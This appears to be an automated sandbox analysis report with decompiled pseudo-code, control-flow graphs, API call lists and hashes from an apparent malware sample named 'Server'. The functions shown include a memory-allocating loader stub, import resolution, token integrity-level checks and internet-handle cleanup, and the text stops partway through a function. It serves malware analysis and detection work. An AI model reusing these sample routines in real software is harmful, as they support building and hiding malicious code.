20281ba-20281bc 211->222 212->189 216 202812a-202813a 212->216 213->184 214->197 214->213 215->204 217 202817c-202817f 215->217 216->189 217->204 220 2028181-202818c 217->220 220->198 220->204 221->222 222->198 223 20281be-20281d6 RaiseException 222->223 223->198
            C-Code - Quality: 51%
            			E02027FC5(long _a4, long _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				LONG* _v28;
            				long _v40;
            				long _v44;
            				long _v48;
            				CHAR* _v52;
            				long _v56;
            				CHAR* _v60;
            				long _v64;
            				signed int* _v68;
            				char _v72;
            				signed int _t76;
            				signed int _t80;
            				signed int _t81;
            				intOrPtr* _t82;
            				intOrPtr* _t83;
            				intOrPtr* _t85;
            				intOrPtr* _t90;
            				intOrPtr* _t95;
            				intOrPtr* _t98;
            				struct HINSTANCE__* _t99;
            				void* _t102;
            				intOrPtr* _t104;
            				void* _t115;
            				long _t116;
            				void _t125;
            				void* _t131;
            				signed short _t133;
            				struct HINSTANCE__* _t138;
            				signed int* _t139;
            
            				_t139 = _a4;
            				_v28 = _t139[2] + 0x2020000;
            				_t115 = _t139[3] + 0x2020000;
            				_t131 = _t139[4] + 0x2020000;
            				_v8 = _t139[7];
            				_v60 = _t139[1] + 0x2020000;
            				_v16 = _t139[5] + 0x2020000;
            				_v64 = _a8;
            				_v72 = 0x24;
            				_v68 = _t139;
            				_v56 = 0;
            				asm("stosd");
            				_v48 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				if(( *_t139 & 0x00000001) == 0) {
            					_a8 =  &_v72;
            					RaiseException(0xc06d0057, 0, 1,  &_a8);
            					return 0;
            				}
            				_t138 =  *_v28;
            				_t76 = _a8 - _t115 >> 2 << 2;
            				_t133 =  *(_t131 + _t76);
            				_a4 = _t76;
            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
            				_v56 = _t80;
            				_t81 = _t133 + 0x2020002;
            				if(_t80 == 0) {
            					_t81 = _t133 & 0x0000ffff;
            				}
            				_v52 = _t81;
            				_t82 =  *0x202a1c0; // 0x0
            				_t116 = 0;
            				if(_t82 == 0) {
            					L6:
            					if(_t138 != 0) {
            						L18:
            						_t83 =  *0x202a1c0; // 0x0
            						_v48 = _t138;
            						if(_t83 != 0) {
            							_t116 =  *_t83(2,  &_v72);
            						}
            						if(_t116 != 0) {
            							L32:
            							 *_a8 = _t116;
            							L33:
            							_t85 =  *0x202a1c0; // 0x0
            							if(_t85 != 0) {
            								_v40 = _v40 & 0x00000000;
            								_v48 = _t138;
            								_v44 = _t116;
            								 *_t85(5,  &_v72);
            							}
            							return _t116;
            						} else {
            							if(_t139[5] == _t116 || _t139[7] == _t116) {
            								L27:
            								_t116 = GetProcAddress(_t138, _v52);
            								if(_t116 == 0) {
            									_v40 = GetLastError();
            									_t90 =  *0x202a1bc; // 0x0
            									if(_t90 != 0) {
            										_t116 =  *_t90(4,  &_v72);
            									}
            									if(_t116 == 0) {
            										_a4 =  &_v72;
            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
            										_t116 = _v44;
            									}
            								}
            								goto L32;
            							} else {
            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
            									_t116 =  *(_a4 + _v16);
            									if(_t116 != 0) {
            										goto L32;
            									}
            								}
            								goto L27;
            							}
            						}
            					}
            					_t98 =  *0x202a1c0; // 0x0
            					if(_t98 == 0) {
            						L9:
            						_t99 = LoadLibraryA(_v60); // executed
            						_t138 = _t99;
            						if(_t138 != 0) {
            							L13:
            							if(InterlockedExchange(_v28, _t138) == _t138) {
            								FreeLibrary(_t138);
            							} else {
            								if(_t139[6] != 0) {
            									_t102 = LocalAlloc(0x40, 8);
            									if(_t102 != 0) {
            										 *(_t102 + 4) = _t139;
            										_t125 =  *0x202a1b8; // 0x0
            										 *_t102 = _t125;
            										 *0x202a1b8 = _t102;
            									}
            								}
            							}
            							goto L18;
            						}
            						_v40 = GetLastError();
            						_t104 =  *0x202a1bc; // 0x0
            						if(_t104 == 0) {
            							L12:
            							_a8 =  &_v72;
            							RaiseException(0xc06d007e, 0, 1,  &_a8);
            							return _v44;
            						}
            						_t138 =  *_t104(3,  &_v72);
            						if(_t138 != 0) {
            							goto L13;
            						}
            						goto L12;
            					}
            					_t138 =  *_t98(1,  &_v72);
            					if(_t138 != 0) {
            						goto L13;
            					}
            					goto L9;
            				}
            				_t116 =  *_t82(0,  &_v72);
            				if(_t116 != 0) {
            					goto L33;
            				}
            				goto L6;
            			}


































            0x02027fd4
            0x02027fea
            0x02027ff0
            0x02027ff2
            0x02027ff7
            0x02027ffd
            0x02028002
            0x02028005
            0x02028013
            0x0202801a
            0x0202801d
            0x02028020
            0x02028021
            0x02028024
            0x02028027
            0x0202802a
            0x0202802f
            0x0202803e
            0x00000000
            0x02028044
            0x0202804e
            0x02028058
            0x0202805d
            0x0202805f
            0x02028069
            0x0202806c
            0x0202806f
            0x02028075
            0x02028077
            0x02028077
            0x0202807a
            0x0202807d
            0x02028082
            0x02028086
            0x02028099
            0x0202809b
            0x02028143
            0x02028143
            0x0202814a
            0x0202814d
            0x02028157
            0x02028157
            0x0202815b
            0x020281d9
            0x020281dc
            0x020281de
            0x020281de
            0x020281e5
            0x020281e7
            0x020281f1
            0x020281f4
            0x020281f7
            0x020281f7
            0x00000000
            0x0202815d
            0x02028160
            0x0202818e
            0x02028198
            0x0202819c
            0x020281a4
            0x020281a7
            0x020281ae
            0x020281b8
            0x020281b8
            0x020281bc
            0x020281c1
            0x020281d0
            0x020281d6
            0x020281d6
            0x020281bc
            0x00000000
            0x02028167
            0x0202816a
            0x02028172
            0x02028187
            0x0202818c
            0x00000000
            0x00000000
            0x0202818c
            0x00000000
            0x02028172
            0x02028160
            0x0202815b
            0x020280a1
            0x020280a8
            0x020280b8
            0x020280bb
            0x020280c1
            0x020280c5
            0x02028108
            0x02028114
            0x0202813d
            0x02028116
            0x0202811a
            0x02028120
            0x02028128
            0x0202812a
            0x0202812d
            0x02028133
            0x02028135
            0x02028135
            0x02028128
            0x0202811a
            0x00000000
            0x02028114
            0x020280cd
            0x020280d0
            0x020280d7
            0x020280e7
            0x020280ea
            0x020280fa
            0x00000000
            0x02028100
            0x020280e1
            0x020280e5
            0x00000000
            0x00000000
            0x00000000
            0x020280e5
            0x020280b2
            0x020280b6
            0x00000000
            0x00000000
            0x00000000
            0x020280b6
            0x0202808f
            0x02028093
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0202803E
            • LoadLibraryA.KERNELBASE(?), ref: 020280BB
            • GetLastError.KERNEL32 ref: 020280C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 020280FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $$@MetNet
            • API String ID: 948315288-3365357938
            • Opcode ID: ef68b7d1fdcb5df3943a58b43bb85a54c74ad777410cdd95696325a4fb8fd588
            • Instruction ID: 1ed864fe55fa914d19c0de353a20cb8f415d3722c89e38d662fb237f205b9ed3
            • Opcode Fuzzy Hash: ef68b7d1fdcb5df3943a58b43bb85a54c74ad777410cdd95696325a4fb8fd588
            • Instruction Fuzzy Hash: 3C814175A403199FDB61CF98D880B9EB7F9FF48310F25842AE905D7280EB74E949DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E0202415A(intOrPtr __edx, void** _a4, void** _a8) {
            				intOrPtr _v8;
            				struct _FILETIME* _v12;
            				short _v56;
            				struct _FILETIME* _t12;
            				intOrPtr _t13;
            				void* _t17;
            				void* _t21;
            				intOrPtr _t27;
            				long _t28;
            				void* _t30;
            
            				_t27 = __edx;
            				_t12 =  &_v12;
            				GetSystemTimeAsFileTime(_t12);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v8);
            				_push(_v12);
            				L020282D4();
            				_push(_t12);
            				_v12 = _t12;
            				_t13 =  *0x202a348; // 0xc7d5a8
            				_t5 = _t13 + 0x202b7b4; // 0x2ca8d5c
            				_t6 = _t13 + 0x202b644; // 0x530025
            				_push(0x16);
            				_push( &_v56);
            				_v8 = _t27;
            				L02027F3A();
            				_t17 = CreateFileMappingW(0xffffffff, 0x202a34c, 4, 0, 0x1000,  &_v56); // executed
            				_t30 = _t17;
            				if(_t30 == 0) {
            					_t28 = GetLastError();
            				} else {
            					if(GetLastError() == 0xb7) {
            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            						if(_t21 == 0) {
            							_t28 = GetLastError();
            							if(_t28 != 0) {
            								goto L6;
            							}
            						} else {
            							 *_a4 = _t30;
            							 *_a8 = _t21;
            							_t28 = 0;
            						}
            					} else {
            						_t28 = 2;
            						L6:
            						CloseHandle(_t30);
            					}
            				}
            				return _t28;
            			}













            0x0202415a
            0x02024162
            0x02024166
            0x0202416c
            0x02024171
            0x02024176
            0x02024179
            0x0202417c
            0x02024181
            0x02024182
            0x02024185
            0x0202418a
            0x02024191
            0x0202419b
            0x0202419d
            0x0202419e
            0x020241a1
            0x020241bd
            0x020241c3
            0x020241c7
            0x02024215
            0x020241c9
            0x020241d6
            0x020241e6
            0x020241ee
            0x02024200
            0x02024204
            0x00000000
            0x00000000
            0x020241f0
            0x020241f3
            0x020241f8
            0x020241fa
            0x020241fa
            0x020241d8
            0x020241da
            0x02024206
            0x02024207
            0x02024207
            0x020241d6
            0x0202421c

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?,?), ref: 02024166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0202417C
            • _snwprintf.NTDLL ref: 020241A1
            • CreateFileMappingW.KERNELBASE(000000FF,0202A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 020241BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?), ref: 020241CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 020241E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53), ref: 02024207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?), ref: 0202420F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID: @MetNet
            • API String ID: 1814172918-2109406137
            • Opcode ID: 80412463d08b4ce95b55cdb20af1c3329ad31767cd792f341c9c406c4509a74d
            • Instruction ID: 66c9e8b693e43c17324f2a7afb5996b596fd4065d10386f6d0c537fe7df23cc7
            • Opcode Fuzzy Hash: 80412463d08b4ce95b55cdb20af1c3329ad31767cd792f341c9c406c4509a74d
            • Instruction Fuzzy Hash: C021C072A80328BBD721EB65CC45F9E37B9BB84B54F360022F909E6180DB70991DDB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 257 1fc003c-1fc0047 258 1fc004c-1fc0263 call 1fc0a3f call 1fc0e0f call 1fc0d90 VirtualAlloc 257->258 259 1fc0049 257->259 275 1fc028b-1fc0292 258->275 276 1fc0265-1fc0289 call 1fc0a69 258->276 259->258 278 1fc02a1-1fc02b0 275->278 280 1fc02ce-1fc03c2 VirtualProtect call 1fc0cce call 1fc0ce7 276->280 278->280 281 1fc02b2-1fc02cc 278->281 287 1fc03d1-1fc03e0 280->287 281->278 288 1fc0439-1fc04b8 VirtualFree 287->288 289 1fc03e2-1fc0437 call 1fc0ce7 287->289 291 1fc04be-1fc04cd 288->291 292 1fc05f4-1fc05fe 288->292 289->287 294 1fc04d3-1fc04dd 291->294 295 1fc077f-1fc0789 292->295 296 1fc0604-1fc060d 292->296 294->292 300 1fc04e3-1fc0505 LoadLibraryA 294->300 298 1fc078b-1fc07a3 295->298 299 1fc07a6-1fc07b0 295->299 296->295 301 1fc0613-1fc0637 296->301 298->299 302 1fc086e-1fc08be LoadLibraryA 299->302 303 1fc07b6-1fc07cb 299->303 304 1fc0517-1fc0520 300->304 305 1fc0507-1fc0515 300->305 306 1fc063e-1fc0648 301->306 310 1fc08c7-1fc08f9 302->310 307 1fc07d2-1fc07d5 303->307 308 1fc0526-1fc0547 304->308 305->308 306->295 309 1fc064e-1fc065a 306->309 311 1fc0824-1fc0833 307->311 312 1fc07d7-1fc07e0 307->312 313 1fc054d-1fc0550 308->313 309->295 314 1fc0660-1fc066a 309->314 315 1fc08fb-1fc0901 310->315 316 1fc0902-1fc091d 310->316 322 1fc0839-1fc083c 311->322 317 1fc07e4-1fc0822 312->317 318 1fc07e2 312->318 319 1fc0556-1fc056b 313->319 320 1fc05e0-1fc05ef 313->320 321 1fc067a-1fc0689 314->321 315->316 317->307 318->311 323 1fc056d 319->323 324 1fc056f-1fc057a 319->324 320->294 325 1fc068f-1fc06b2 321->325 326 1fc0750-1fc077a 321->326 322->302 327 1fc083e-1fc0847 322->327 323->320 329 1fc057c-1fc0599 324->329 330 1fc059b-1fc05bb 324->330 331 1fc06ef-1fc06fc 325->331 332 1fc06b4-1fc06ed 325->332 326->306 333 1fc0849 327->333 334 1fc084b-1fc086c 327->334 341 1fc05bd-1fc05db 329->341 330->341 335 1fc06fe-1fc0748 331->335 336 1fc074b 331->336 332->331 333->302 334->322 335->336 336->321 341->313
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction ID: a5c574cd58e517a40efcf4c2b804d3ba0007d693fe7eaa4450cac5bff4cadf46
            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction Fuzzy Hash: 89526979A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB351DB31AA85DF14
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 93%
            			E02024BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
            				void* _t17;
            				void* _t18;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            				intOrPtr _t24;
            				void* _t37;
            				void* _t41;
            				intOrPtr* _t45;
            
            				_t41 = __edi;
            				_t37 = __ebx;
            				_t45 = __eax;
            				_t16 =  *((intOrPtr*)(__eax + 0x20));
            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
            					E020216B2(_t16, __ecx, 0xea60);
            				}
            				_t17 =  *(_t45 + 0x18);
            				_push(_t37);
            				_push(_t41);
            				if(_t17 != 0) {
            					InternetSetStatusCallback(_t17, 0);
            					InternetCloseHandle( *(_t45 + 0x18)); // executed
            				}
            				_t18 =  *(_t45 + 0x14);
            				if(_t18 != 0) {
            					InternetSetStatusCallback(_t18, 0);
            					InternetCloseHandle( *(_t45 + 0x14));
            				}
            				_t19 =  *(_t45 + 0x10);
            				if(_t19 != 0) {
            					InternetSetStatusCallback(_t19, 0);
            					InternetCloseHandle( *(_t45 + 0x10));
            				}
            				_t20 =  *(_t45 + 0x1c);
            				if(_t20 != 0) {
            					CloseHandle(_t20);
            				}
            				_t21 =  *(_t45 + 0x20);
            				if(_t21 != 0) {
            					CloseHandle(_t21);
            				}
            				_t22 =  *((intOrPtr*)(_t45 + 8));
            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
            					E020261DA(_t22);
            					 *((intOrPtr*)(_t45 + 8)) = 0;
            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
            				}
            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
            					E020261DA(_t23);
            				}
            				_t24 =  *_t45;
            				if(_t24 != 0) {
            					_t24 = E020261DA(_t24);
            				}
            				_t46 =  *((intOrPtr*)(_t45 + 4));
            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
            					return E020261DA(_t46);
            				}
            				return _t24;
            			}












            0x02024be7
            0x02024be7
            0x02024be9
            0x02024beb
            0x02024bf2
            0x02024bf9
            0x02024bf9
            0x02024bfe
            0x02024c01
            0x02024c08
            0x02024c11
            0x02024c15
            0x02024c1a
            0x02024c1a
            0x02024c1c
            0x02024c21
            0x02024c25
            0x02024c2a
            0x02024c2a
            0x02024c2c
            0x02024c31
            0x02024c35
            0x02024c3a
            0x02024c3a
            0x02024c3c
            0x02024c47
            0x02024c4a
            0x02024c4a
            0x02024c4c
            0x02024c51
            0x02024c54
            0x02024c54
            0x02024c56
            0x02024c5d
            0x02024c60
            0x02024c65
            0x02024c68
            0x02024c68
            0x02024c6b
            0x02024c70
            0x02024c73
            0x02024c73
            0x02024c78
            0x02024c7c
            0x02024c7f
            0x02024c7f
            0x02024c84
            0x02024c89
            0x00000000
            0x02024c8c
            0x02024c93

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C15
            • InternetCloseHandle.WININET(?), ref: 02024C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C25
            • InternetCloseHandle.WININET(?), ref: 02024C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C35
            • InternetCloseHandle.WININET(?), ref: 02024C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02022248,?,?,746981D0,00000000,00000000), ref: 02024C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02022248,?,?,746981D0,00000000,00000000), ref: 02024C54
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: 0c762e554abcef0350369b81271f916cce80d40bb0dce02e9b2b1a73a5432f78
            • Instruction ID: 4136430a4231a9c3ba1a46d67cb25c2dde477d0a45a4798a9be4a5dc69613f3e
            • Opcode Fuzzy Hash: 0c762e554abcef0350369b81271f916cce80d40bb0dce02e9b2b1a73a5432f78
            • Instruction Fuzzy Hash: 5F117F36A007785BC671AFA9DD84C5BB7EEFF442083660D1AE089D3511C735F84D9A20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E02025E40(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
            				_v16 = 1;
            				_v20 = 0x2000;
            				if( *0x202a2fc > 5) {
            					_v16 = 0;
            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
            						_v8 = 0;
            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
            						if(_v8 != 0) {
            							_t46 = E020233DC(_v8);
            							if(_t46 != 0) {
            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
            								if(_t33 != 0) {
            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
            								}
            								E020261DA(_t46);
            							}
            						}
            						CloseHandle(_v12);
            					}
            				}
            				 *_a4 = _v20;
            				return _v16;
            			}









            0x02025e4d
            0x02025e54
            0x02025e5b
            0x02025e6f
            0x02025e7a
            0x02025e92
            0x02025e9f
            0x02025ea2
            0x02025ea7
            0x02025eb2
            0x02025eb6
            0x02025ec5
            0x02025ec9
            0x02025ee5
            0x02025ee5
            0x02025ee9
            0x02025ee9
            0x02025eee
            0x02025ef2
            0x02025ef8
            0x02025ef9
            0x02025f00
            0x02025f06

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02025E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02025E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02025EA2
            • CloseHandle.KERNEL32(00000000), ref: 02025EF2
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02025EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02025ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02025EDD
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: 49ad414150ead08e713bf00e7cf970d24a9be8ab470f334a820e61578a33cb3f
            • Instruction ID: 47abb9b83050b5c478ba00f7f083427d5e10bc0d5c2d103a0c56357d28333ff9
            • Opcode Fuzzy Hash: 49ad414150ead08e713bf00e7cf970d24a9be8ab470f334a820e61578a33cb3f
            • Instruction Fuzzy Hash: 5B21397590021DBFEB119F94CC84EEEBBB9FB48314F1004A6E910A6150CB759A58EF64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 64%
            			E02026675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				intOrPtr _v8;
            				intOrPtr _t9;
            				intOrPtr _t13;
            				char* _t19;
            				char* _t28;
            				void* _t33;
            				void* _t34;
            				char* _t36;
            				void* _t38;
            				intOrPtr* _t39;
            				char* _t40;
            				char* _t42;
            				char* _t43;
            
            				_t34 = __edx;
            				_push(__ecx);
            				_t9 =  *0x202a348; // 0xc7d5a8
            				_t1 = _t9 + 0x202b516; // 0x253d7325
            				_t36 = 0;
            				_t28 = E02025815(__ecx, _t1);
            				if(_t28 != 0) {
            					_t39 = __imp__;
            					_t13 =  *_t39(_t28, _t38);
            					_v8 = _t13;
            					_t6 =  *_t39(_a4) + 1; // 0x2ca9601
            					_t40 = E020233DC(_v8 + _t6);
            					if(_t40 != 0) {
            						strcpy(_t40, _t28);
            						_pop(_t33);
            						__imp__(_t40, _a4);
            						_t19 = E02025063(_t33, _t34, _t40, _a8); // executed
            						_t36 = _t19;
            						E020261DA(_t40);
            						_t42 = E02024AC7(StrTrimA(_t36, "="), _t36);
            						if(_t42 != 0) {
            							E020261DA(_t36);
            							_t36 = _t42;
            						}
            						_t43 = E02022708(_t36, _t33);
            						if(_t43 != 0) {
            							E020261DA(_t36);
            							_t36 = _t43;
            						}
            					}
            					E020261DA(_t28);
            				}
            				return _t36;
            			}
















            0x02026675
            0x02026678
            0x02026679
            0x02026680
            0x02026687
            0x0202668e
            0x02026692
            0x02026699
            0x020266a0
            0x020266a5
            0x020266ad
            0x020266b7
            0x020266bb
            0x020266bf
            0x020266c5
            0x020266ca
            0x020266d4
            0x020266da
            0x020266dc
            0x020266f3
            0x020266f7
            0x020266fa
            0x020266ff
            0x020266ff
            0x02026708
            0x0202670c
            0x0202670f
            0x02026714
            0x02026714
            0x0202670c
            0x02026717
            0x0202671c
            0x02026722

            APIs
              • Part of subcall function 02025815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0202668E,253D7325,00000000,00000000,?,76B5C740,02023ECE), ref: 0202587C
              • Part of subcall function 02025815: sprintf.NTDLL ref: 0202589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
            • lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • strcpy.NTDLL ref: 020266BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02025063: lstrlen.KERNEL32(00000000,00000000,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02025074
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
              • Part of subcall function 02024AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,020266F3,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02024AD1
              • Part of subcall function 02024AC7: _snprintf.NTDLL ref: 02024B2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: e8e675b3b2a48e0f5507fa958083e69071adbbbaf064d8ea256c8f04812781e6
            • Instruction ID: e7acbfa1cb3f55d09b634e46699c396ea02e2ea9fb617c97f630fdeed1afaed3
            • Opcode Fuzzy Hash: e8e675b3b2a48e0f5507fa958083e69071adbbbaf064d8ea256c8f04812781e6
            • Instruction Fuzzy Hash: CF1191329113396B4722ABA89CC4CEE3AAEAF456643194057F904A7101DE69D90E6BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 435 401202-401214 call 4012e6 438 4012d5 435->438 439 40121a-40124f GetModuleHandleA GetProcAddress 435->439 440 4012dc-4012e3 438->440 441 401251-401265 GetProcAddress 439->441 442 4012cd-4012d3 call 401ba9 439->442 441->442 444 401267-40127b GetProcAddress 441->444 442->440 444->442 446 40127d-401291 GetProcAddress 444->446 446->442 447 401293-4012a7 GetProcAddress 446->447 447->442 448 4012a9-4012ba call 40110b 447->448 450 4012bf-4012c4 448->450 450->442 451 4012c6-4012cb 450->451 451->440
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
